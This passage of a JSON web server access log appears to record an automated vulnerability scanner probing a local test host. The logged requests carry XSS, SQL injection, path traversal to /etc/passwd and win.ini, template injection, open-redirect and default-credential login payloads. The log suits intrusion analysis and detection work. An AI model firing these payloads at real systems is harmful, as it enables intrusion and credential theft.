"http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.678","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.689","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.827","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22csrf_token\x22\x0D\x0A\x0D\x0A{{csrf}}\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2228fHqWpNd6dSWS1tgGWJpPJybnW.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x0D\x0A \x22type\x22: \x2228fHqWpNd6dSWS1tgGWJpPJybnW\x22\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /variable/varimport HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/admin/variable/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.160","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.098","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"option_key=a&perpose=update&callback=phpinfo","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.310","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.691","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.615","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.247","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.825","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.old HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.709","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.448","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.427","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /header.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.dist HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.463","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.439","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wiki HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.827","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.121","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.451","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.114","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; 